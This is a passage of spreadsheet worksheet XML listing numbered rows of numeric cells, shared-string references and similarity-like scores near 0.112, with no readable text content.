    </row>
    <row r="28753" ht="15.75" customHeight="1">
      <c r="A28753" s="1">
        <v>3012.0</v>
      </c>
      <c r="B28753" s="2">
        <v>3.6381932E7</v>
      </c>
      <c r="C28753" s="2" t="s">
        <v>27638</v>
      </c>
      <c r="D28753" s="2">
        <v>1.0</v>
      </c>
      <c r="E28753" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28753" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28754" ht="15.75" customHeight="1">
      <c r="A28754" s="1">
        <v>3082.0</v>
      </c>
      <c r="B28754" s="2">
        <v>3.6605292E7</v>
      </c>
      <c r="C28754" s="2" t="s">
        <v>27639</v>
      </c>
      <c r="D28754" s="2">
        <v>1.0</v>
      </c>
      <c r="E28754" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28754" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28755" ht="15.75" customHeight="1">
      <c r="A28755" s="1">
        <v>3165.0</v>
      </c>
      <c r="B28755" s="2">
        <v>3.7031013E7</v>
      </c>
      <c r="C28755" s="2" t="s">
        <v>27640</v>
      </c>
      <c r="D28755" s="2">
        <v>1.0</v>
      </c>
      <c r="E28755" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28755" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28756" ht="15.75" customHeight="1">
      <c r="A28756" s="1">
        <v>3208.0</v>
      </c>
      <c r="B28756" s="2">
        <v>3.7284101E7</v>
      </c>
      <c r="C28756" s="2" t="s">
        <v>27641</v>
      </c>
      <c r="D28756" s="2">
        <v>1.0</v>
      </c>
      <c r="E28756" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28756" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28757" ht="15.75" customHeight="1">
      <c r="A28757" s="1">
        <v>3435.0</v>
      </c>
      <c r="B28757" s="2">
        <v>3.8213712E7</v>
      </c>
      <c r="C28757" s="2" t="s">
        <v>27642</v>
      </c>
      <c r="D28757" s="2">
        <v>1.0</v>
      </c>
      <c r="E28757" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28757" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28758" ht="15.75" customHeight="1">
      <c r="A28758" s="1">
        <v>3437.0</v>
      </c>
      <c r="B28758" s="2">
        <v>3.8219513E7</v>
      </c>
      <c r="C28758" s="2" t="s">
        <v>27643</v>
      </c>
      <c r="D28758" s="2">
        <v>1.0</v>
      </c>
      <c r="E28758" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28758" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28759" ht="15.75" customHeight="1">
      <c r="A28759" s="1">
        <v>5340.0</v>
      </c>
      <c r="B28759" s="2">
        <v>4.5330182E7</v>
      </c>
      <c r="C28759" s="2" t="s">
        <v>27644</v>
      </c>
      <c r="D28759" s="2">
        <v>1.0</v>
      </c>
      <c r="E28759" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28759" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28760" ht="15.75" customHeight="1">
      <c r="A28760" s="1">
        <v>5358.0</v>
      </c>
      <c r="B28760" s="2">
        <v>4.5370622E7</v>
      </c>
      <c r="C28760" s="2" t="s">
        <v>27645</v>
      </c>
      <c r="D28760" s="2">
        <v>1.0</v>
      </c>
      <c r="E28760" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28760" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28761" ht="15.75" customHeight="1">
      <c r="A28761" s="1">
        <v>5578.0</v>
      </c>
      <c r="B28761" s="2">
        <v>4.6044932E7</v>
      </c>
      <c r="C28761" s="2" t="s">
        <v>27646</v>
      </c>
      <c r="D28761" s="2">
        <v>1.0</v>
      </c>
      <c r="E28761" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28761" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28762" ht="15.75" customHeight="1">
      <c r="A28762" s="1">
        <v>5930.0</v>
      </c>
      <c r="B28762" s="2">
        <v>4.7247559E7</v>
      </c>
      <c r="C28762" s="2" t="s">
        <v>27647</v>
      </c>
      <c r="D28762" s="2">
        <v>1.0</v>
      </c>
      <c r="E28762" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28762" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28763" ht="15.75" customHeight="1">
      <c r="A28763" s="1">
        <v>6188.0</v>
      </c>
      <c r="B28763" s="2">
        <v>4.7909065E7</v>
      </c>
      <c r="C28763" s="2" t="s">
        <v>27648</v>
      </c>
      <c r="D28763" s="2">
        <v>1.0</v>
      </c>
      <c r="E28763" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28763" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28764" ht="15.75" customHeight="1">
      <c r="A28764" s="1">
        <v>6810.0</v>
      </c>
      <c r="B28764" s="2">
        <v>4.9525029E7</v>
      </c>
      <c r="C28764" s="2" t="s">
        <v>27649</v>
      </c>
      <c r="D28764" s="2">
        <v>1.0</v>
      </c>
      <c r="E28764" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28764" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28765" ht="15.75" customHeight="1">
      <c r="A28765" s="1">
        <v>6923.0</v>
      </c>
      <c r="B28765" s="2">
        <v>4.9874684E7</v>
      </c>
      <c r="C28765" s="2" t="s">
        <v>27650</v>
      </c>
      <c r="D28765" s="2">
        <v>1.0</v>
      </c>
      <c r="E28765" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28765" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28766" ht="15.75" customHeight="1">
      <c r="A28766" s="1">
        <v>9361.0</v>
      </c>
      <c r="B28766" s="2">
        <v>5.5678451E7</v>
      </c>
      <c r="C28766" s="2" t="s">
        <v>27651</v>
      </c>
      <c r="D28766" s="2">
        <v>1.0</v>
      </c>
      <c r="E28766" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28766" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28767" ht="15.75" customHeight="1">
      <c r="A28767" s="1">
        <v>10005.0</v>
      </c>
      <c r="B28767" s="2">
        <v>5.7015772E7</v>
      </c>
      <c r="C28767" s="2" t="s">
        <v>27652</v>
      </c>
      <c r="D28767" s="2">
        <v>1.0</v>
      </c>
      <c r="E28767" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28767" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28768" ht="15.75" customHeight="1">
      <c r="A28768" s="1">
        <v>10007.0</v>
      </c>
      <c r="B28768" s="2">
        <v>5.7015772E7</v>
      </c>
      <c r="C28768" s="2" t="s">
        <v>27652</v>
      </c>
      <c r="D28768" s="2">
        <v>1.0</v>
      </c>
      <c r="E28768" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28768" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28769" ht="15.75" customHeight="1">
      <c r="A28769" s="1">
        <v>10743.0</v>
      </c>
      <c r="B28769" s="2">
        <v>1.5445228E7</v>
      </c>
      <c r="C28769" s="2" t="s">
        <v>27653</v>
      </c>
      <c r="D28769" s="2">
        <v>1.0</v>
      </c>
      <c r="E28769" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28769" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28770" ht="15.75" customHeight="1">
      <c r="A28770" s="1">
        <v>10971.0</v>
      </c>
      <c r="B28770" s="2">
        <v>1.7280414E7</v>
      </c>
      <c r="C28770" s="2" t="s">
        <v>27654</v>
      </c>
      <c r="D28770" s="2">
        <v>1.0</v>
      </c>
      <c r="E28770" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28770" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28771" ht="15.75" customHeight="1">
      <c r="A28771" s="1">
        <v>11352.0</v>
      </c>
      <c r="B28771" s="2">
        <v>2.1293802E7</v>
      </c>
      <c r="C28771" s="2" t="s">
        <v>27655</v>
      </c>
      <c r="D28771" s="2">
        <v>1.0</v>
      </c>
      <c r="E28771" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28771" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28772" ht="15.75" customHeight="1">
      <c r="A28772" s="1">
        <v>11414.0</v>
      </c>
      <c r="B28772" s="2">
        <v>2.1660749E7</v>
      </c>
      <c r="C28772" s="2" t="s">
        <v>27656</v>
      </c>
      <c r="D28772" s="2">
        <v>1.0</v>
      </c>
      <c r="E28772" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28772" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28773" ht="15.75" customHeight="1">
      <c r="A28773" s="1">
        <v>11701.0</v>
      </c>
      <c r="B28773" s="2">
        <v>2.3505351E7</v>
      </c>
      <c r="C28773" s="2" t="s">
        <v>27657</v>
      </c>
      <c r="D28773" s="2">
        <v>1.0</v>
      </c>
      <c r="E28773" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28773" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28774" ht="15.75" customHeight="1">
      <c r="A28774" s="1">
        <v>11975.0</v>
      </c>
      <c r="B28774" s="2">
        <v>2.5777177E7</v>
      </c>
      <c r="C28774" s="2" t="s">
        <v>27658</v>
      </c>
      <c r="D28774" s="2">
        <v>1.0</v>
      </c>
      <c r="E28774" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28774" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28775" ht="15.75" customHeight="1">
      <c r="A28775" s="1">
        <v>12507.0</v>
      </c>
      <c r="B28775" s="2">
        <v>2.9638773E7</v>
      </c>
      <c r="C28775" s="2" t="s">
        <v>27659</v>
      </c>
      <c r="D28775" s="2">
        <v>1.0</v>
      </c>
      <c r="E28775" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28775" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28776" ht="15.75" customHeight="1">
      <c r="A28776" s="1">
        <v>12729.0</v>
      </c>
      <c r="B28776" s="2">
        <v>3.0985329E7</v>
      </c>
      <c r="C28776" s="2" t="s">
        <v>27660</v>
      </c>
      <c r="D28776" s="2">
        <v>1.0</v>
      </c>
      <c r="E28776" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28776" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28777" ht="15.75" customHeight="1">
      <c r="A28777" s="1">
        <v>12829.0</v>
      </c>
      <c r="B28777" s="2">
        <v>3.1643177E7</v>
      </c>
      <c r="C28777" s="2" t="s">
        <v>27661</v>
      </c>
      <c r="D28777" s="2">
        <v>1.0</v>
      </c>
      <c r="E28777" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28777" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28778" ht="15.75" customHeight="1">
      <c r="A28778" s="1">
        <v>13083.0</v>
      </c>
      <c r="B28778" s="2">
        <v>3.3365097E7</v>
      </c>
      <c r="C28778" s="2" t="s">
        <v>27662</v>
      </c>
      <c r="D28778" s="2">
        <v>1.0</v>
      </c>
      <c r="E28778" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28778" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28779" ht="15.75" customHeight="1">
      <c r="A28779" s="1">
        <v>13805.0</v>
      </c>
      <c r="B28779" s="2">
        <v>3.6658767E7</v>
      </c>
      <c r="C28779" s="2" t="s">
        <v>27663</v>
      </c>
      <c r="D28779" s="2">
        <v>1.0</v>
      </c>
      <c r="E28779" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28779" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28780" ht="15.75" customHeight="1">
      <c r="A28780" s="1">
        <v>14542.0</v>
      </c>
      <c r="B28780" s="2">
        <v>3.9906578E7</v>
      </c>
      <c r="C28780" s="2" t="s">
        <v>27664</v>
      </c>
      <c r="D28780" s="2">
        <v>1.0</v>
      </c>
      <c r="E28780" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28780" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28781" ht="15.75" customHeight="1">
      <c r="A28781" s="1">
        <v>14994.0</v>
      </c>
      <c r="B28781" s="2">
        <v>4.1427302E7</v>
      </c>
      <c r="C28781" s="2" t="s">
        <v>27665</v>
      </c>
      <c r="D28781" s="2">
        <v>1.0</v>
      </c>
      <c r="E28781" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28781" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28782" ht="15.75" customHeight="1">
      <c r="A28782" s="1">
        <v>15398.0</v>
      </c>
      <c r="B28782" s="2">
        <v>4.2827562E7</v>
      </c>
      <c r="C28782" s="2" t="s">
        <v>27666</v>
      </c>
      <c r="D28782" s="2">
        <v>1.0</v>
      </c>
      <c r="E28782" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28782" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28783" ht="15.75" customHeight="1">
      <c r="A28783" s="1">
        <v>15980.0</v>
      </c>
      <c r="B28783" s="2">
        <v>4.4905852E7</v>
      </c>
      <c r="C28783" s="2" t="s">
        <v>27667</v>
      </c>
      <c r="D28783" s="2">
        <v>1.0</v>
      </c>
      <c r="E28783" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28783" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28784" ht="15.75" customHeight="1">
      <c r="A28784" s="1">
        <v>16567.0</v>
      </c>
      <c r="B28784" s="2">
        <v>4.6868032E7</v>
      </c>
      <c r="C28784" s="2" t="s">
        <v>27668</v>
      </c>
      <c r="D28784" s="2">
        <v>1.0</v>
      </c>
      <c r="E28784" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28784" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28785" ht="15.75" customHeight="1">
      <c r="A28785" s="1">
        <v>17142.0</v>
      </c>
      <c r="B28785" s="2">
        <v>4.8830425E7</v>
      </c>
      <c r="C28785" s="2" t="s">
        <v>27669</v>
      </c>
      <c r="D28785" s="2">
        <v>1.0</v>
      </c>
      <c r="E28785" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28785" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28786" ht="15.75" customHeight="1">
      <c r="A28786" s="1">
        <v>18018.0</v>
      </c>
      <c r="B28786" s="2">
        <v>5.150547E7</v>
      </c>
      <c r="C28786" s="2" t="s">
        <v>27670</v>
      </c>
      <c r="D28786" s="2">
        <v>1.0</v>
      </c>
      <c r="E28786" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28786" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28787" ht="15.75" customHeight="1">
      <c r="A28787" s="1">
        <v>18666.0</v>
      </c>
      <c r="B28787" s="2">
        <v>5.3529131E7</v>
      </c>
      <c r="C28787" s="2" t="s">
        <v>27671</v>
      </c>
      <c r="D28787" s="2">
        <v>1.0</v>
      </c>
      <c r="E28787" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28787" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28788" ht="15.75" customHeight="1">
      <c r="A28788" s="1">
        <v>18795.0</v>
      </c>
      <c r="B28788" s="2">
        <v>5.3846413E7</v>
      </c>
      <c r="C28788" s="2" t="s">
        <v>27672</v>
      </c>
      <c r="D28788" s="2">
        <v>1.0</v>
      </c>
      <c r="E28788" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28788" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28789" ht="15.75" customHeight="1">
      <c r="A28789" s="1">
        <v>18925.0</v>
      </c>
      <c r="B28789" s="2">
        <v>5.4244049E7</v>
      </c>
      <c r="C28789" s="2" t="s">
        <v>27673</v>
      </c>
      <c r="D28789" s="2">
        <v>1.0</v>
      </c>
      <c r="E28789" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28789" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28790" ht="15.75" customHeight="1">
      <c r="A28790" s="1">
        <v>19243.0</v>
      </c>
      <c r="B28790" s="2">
        <v>5.5090079E7</v>
      </c>
      <c r="C28790" s="2" t="s">
        <v>27674</v>
      </c>
      <c r="D28790" s="2">
        <v>1.0</v>
      </c>
      <c r="E28790" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28790" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28791" ht="15.75" customHeight="1">
      <c r="A28791" s="1">
        <v>19942.0</v>
      </c>
      <c r="B28791" s="2">
        <v>5.7458747E7</v>
      </c>
      <c r="C28791" s="2" t="s">
        <v>27675</v>
      </c>
      <c r="D28791" s="2">
        <v>1.0</v>
      </c>
      <c r="E28791" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28791" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28792" ht="15.75" customHeight="1">
      <c r="A28792" s="1">
        <v>20184.0</v>
      </c>
      <c r="B28792" s="2">
        <v>1.0500616E7</v>
      </c>
      <c r="C28792" s="2" t="s">
        <v>27676</v>
      </c>
      <c r="D28792" s="2">
        <v>1.0</v>
      </c>
      <c r="E28792" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28792" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28793" ht="15.75" customHeight="1">
      <c r="A28793" s="1">
        <v>20257.0</v>
      </c>
      <c r="B28793" s="2">
        <v>1.1035508E7</v>
      </c>
      <c r="C28793" s="2" t="s">
        <v>27677</v>
      </c>
      <c r="D28793" s="2">
        <v>1.0</v>
      </c>
      <c r="E28793" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28793" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28794" ht="15.75" customHeight="1">
      <c r="A28794" s="1">
        <v>22407.0</v>
      </c>
      <c r="B28794" s="2">
        <v>3.5767041E7</v>
      </c>
      <c r="C28794" s="2" t="s">
        <v>27678</v>
      </c>
      <c r="D28794" s="2">
        <v>1.0</v>
      </c>
      <c r="E28794" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28794" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28795" ht="15.75" customHeight="1">
      <c r="A28795" s="1">
        <v>22833.0</v>
      </c>
      <c r="B28795" s="2">
        <v>4.6470558E7</v>
      </c>
      <c r="C28795" s="2" t="s">
        <v>27679</v>
      </c>
      <c r="D28795" s="2">
        <v>1.0</v>
      </c>
      <c r="E28795" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28795" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28796" ht="15.75" customHeight="1">
      <c r="A28796" s="1">
        <v>22886.0</v>
      </c>
      <c r="B28796" s="2">
        <v>4.7792029E7</v>
      </c>
      <c r="C28796" s="2" t="s">
        <v>27680</v>
      </c>
      <c r="D28796" s="2">
        <v>1.0</v>
      </c>
      <c r="E28796" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28796" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28797" ht="15.75" customHeight="1">
      <c r="A28797" s="1">
        <v>23526.0</v>
      </c>
      <c r="B28797" s="2">
        <v>5877449.0</v>
      </c>
      <c r="C28797" s="2" t="s">
        <v>27681</v>
      </c>
      <c r="D28797" s="2">
        <v>1.0</v>
      </c>
      <c r="E28797" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28797" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28798" ht="15.75" customHeight="1">
      <c r="A28798" s="1">
        <v>23677.0</v>
      </c>
      <c r="B28798" s="2">
        <v>6936557.0</v>
      </c>
      <c r="C28798" s="2" t="s">
        <v>27682</v>
      </c>
      <c r="D28798" s="2">
        <v>1.0</v>
      </c>
      <c r="E28798" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28798" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28799" ht="15.75" customHeight="1">
      <c r="A28799" s="1">
        <v>23896.0</v>
      </c>
      <c r="B28799" s="2">
        <v>8453890.0</v>
      </c>
      <c r="C28799" s="2" t="s">
        <v>27683</v>
      </c>
      <c r="D28799" s="2">
        <v>1.0</v>
      </c>
      <c r="E28799" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28799" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28800" ht="15.75" customHeight="1">
      <c r="A28800" s="1">
        <v>25311.0</v>
      </c>
      <c r="B28800" s="2">
        <v>1.3432386E7</v>
      </c>
      <c r="C28800" s="2" t="s">
        <v>27684</v>
      </c>
      <c r="D28800" s="2">
        <v>1.0</v>
      </c>
      <c r="E28800" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28800" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28801" ht="15.75" customHeight="1">
      <c r="A28801" s="1">
        <v>25321.0</v>
      </c>
      <c r="B28801" s="2">
        <v>1.3440143E7</v>
      </c>
      <c r="C28801" s="2" t="s">
        <v>27685</v>
      </c>
      <c r="D28801" s="2">
        <v>1.0</v>
      </c>
      <c r="E28801" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28801" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28802" ht="15.75" customHeight="1">
      <c r="A28802" s="1">
        <v>25579.0</v>
      </c>
      <c r="B28802" s="2">
        <v>1.4334369E7</v>
      </c>
      <c r="C28802" s="2" t="s">
        <v>27686</v>
      </c>
      <c r="D28802" s="2">
        <v>1.0</v>
      </c>
      <c r="E28802" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28802" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28803" ht="15.75" customHeight="1">
      <c r="A28803" s="1">
        <v>26745.0</v>
      </c>
      <c r="B28803" s="2">
        <v>1.8314457E7</v>
      </c>
      <c r="C28803" s="2" t="s">
        <v>27687</v>
      </c>
      <c r="D28803" s="2">
        <v>1.0</v>
      </c>
      <c r="E28803" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28803" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28804" ht="15.75" customHeight="1">
      <c r="A28804" s="1">
        <v>27047.0</v>
      </c>
      <c r="B28804" s="2">
        <v>2.0249139E7</v>
      </c>
      <c r="C28804" s="2" t="s">
        <v>27688</v>
      </c>
      <c r="D28804" s="2">
        <v>1.0</v>
      </c>
      <c r="E28804" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28804" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28805" ht="15.75" customHeight="1">
      <c r="A28805" s="1">
        <v>28330.0</v>
      </c>
      <c r="B28805" s="2">
        <v>2.5879564E7</v>
      </c>
      <c r="C28805" s="2" t="s">
        <v>27689</v>
      </c>
      <c r="D28805" s="2">
        <v>1.0</v>
      </c>
      <c r="E28805" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28805" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28806" ht="15.75" customHeight="1">
      <c r="A28806" s="1">
        <v>28718.0</v>
      </c>
      <c r="B28806" s="2">
        <v>2.7868968E7</v>
      </c>
      <c r="C28806" s="2" t="s">
        <v>27690</v>
      </c>
      <c r="D28806" s="2">
        <v>1.0</v>
      </c>
      <c r="E28806" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28806" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28807" ht="15.75" customHeight="1">
      <c r="A28807" s="1">
        <v>28860.0</v>
      </c>
      <c r="B28807" s="2">
        <v>2.9056245E7</v>
      </c>
      <c r="C28807" s="2" t="s">
        <v>27691</v>
      </c>
      <c r="D28807" s="2">
        <v>1.0</v>
      </c>
      <c r="E28807" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28807" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28808" ht="15.75" customHeight="1">
      <c r="A28808" s="1">
        <v>29919.0</v>
      </c>
      <c r="B28808" s="2">
        <v>3607050.0</v>
      </c>
      <c r="C28808" s="2" t="s">
        <v>27692</v>
      </c>
      <c r="D28808" s="2">
        <v>1.0</v>
      </c>
      <c r="E28808" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28808" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28809" ht="15.75" customHeight="1">
      <c r="A28809" s="1">
        <v>30415.0</v>
      </c>
      <c r="B28809" s="2">
        <v>3.8802004E7</v>
      </c>
      <c r="C28809" s="2" t="s">
        <v>27693</v>
      </c>
      <c r="D28809" s="2">
        <v>1.0</v>
      </c>
      <c r="E28809" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28809" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28810" ht="15.75" customHeight="1">
      <c r="A28810" s="1">
        <v>31643.0</v>
      </c>
      <c r="B28810" s="2">
        <v>5147249.0</v>
      </c>
      <c r="C28810" s="2" t="s">
        <v>27694</v>
      </c>
      <c r="D28810" s="2">
        <v>1.0</v>
      </c>
      <c r="E28810" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28810" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28811" ht="15.75" customHeight="1">
      <c r="A28811" s="1">
        <v>32279.0</v>
      </c>
      <c r="B28811" s="2">
        <v>5534375.0</v>
      </c>
      <c r="C28811" s="2" t="s">
        <v>27695</v>
      </c>
      <c r="D28811" s="2">
        <v>1.0</v>
      </c>
      <c r="E28811" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28811" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28812" ht="15.75" customHeight="1">
      <c r="A28812" s="1">
        <v>32471.0</v>
      </c>
      <c r="B28812" s="2">
        <v>5.6871663E7</v>
      </c>
      <c r="C28812" s="2" t="s">
        <v>27696</v>
      </c>
      <c r="D28812" s="2">
        <v>1.0</v>
      </c>
      <c r="E28812" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28812" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28813" ht="15.75" customHeight="1">
      <c r="A28813" s="1">
        <v>32651.0</v>
      </c>
      <c r="B28813" s="2">
        <v>5877448.0</v>
      </c>
      <c r="C28813" s="2" t="s">
        <v>27681</v>
      </c>
      <c r="D28813" s="2">
        <v>1.0</v>
      </c>
      <c r="E28813" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28813" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="28814" ht="15.75" customHeight="1">
      <c r="A28814" s="1">
        <v>2170.0</v>
      </c>
      <c r="B28814" s="2">
        <v>3.17669E7</v>
      </c>
      <c r="C28814" s="2" t="s">
        <v>27697</v>
      </c>
      <c r="D28814" s="2">
        <v>1.0</v>
      </c>
      <c r="E28814" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28814" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="28815" ht="15.75" customHeight="1">
      <c r="A28815" s="1">
        <v>2854.0</v>
      </c>
      <c r="B28815" s="2">
        <v>3.5511566E7</v>
      </c>
      <c r="C28815" s="2" t="s">
        <v>27698</v>
      </c>
      <c r="D28815" s="2">
        <v>1.0</v>
      </c>
      <c r="E28815" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28815" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="28816" ht="15.75" customHeight="1">
      <c r="A28816" s="1">
        <v>11083.0</v>
      </c>
      <c r="B28816" s="2">
        <v>1.8475196E7</v>
      </c>
      <c r="C28816" s="2" t="s">
        <v>27699</v>
      </c>
      <c r="D28816" s="2">
        <v>1.0</v>
      </c>
      <c r="E28816" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28816" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="28817" ht="15.75" customHeight="1">
      <c r="A28817" s="1">
        <v>28264.0</v>
      </c>
      <c r="B28817" s="2">
        <v>2.536899E7</v>
      </c>
      <c r="C28817" s="2" t="s">
        <v>27700</v>
      </c>
      <c r="D28817" s="2">
        <v>1.0</v>
      </c>
      <c r="E28817" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28817" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="28818" ht="15.75" customHeight="1">
      <c r="A28818" s="1">
        <v>30485.0</v>
      </c>
      <c r="B28818" s="2">
        <v>3.9876881E7</v>
      </c>
      <c r="C28818" s="2" t="s">
        <v>27701</v>
      </c>
      <c r="D28818" s="2">
        <v>1.0</v>
      </c>
      <c r="E28818" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28818" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="28819" ht="15.75" customHeight="1">
      <c r="A28819" s="1">
        <v>9796.0</v>
      </c>
      <c r="B28819" s="2">
        <v>5.6534684E7</v>
      </c>
      <c r="C28819" s="2" t="s">
        <v>27702</v>
      </c>
      <c r="D28819" s="2">
        <v>1.0</v>
      </c>
      <c r="E28819" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28819" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
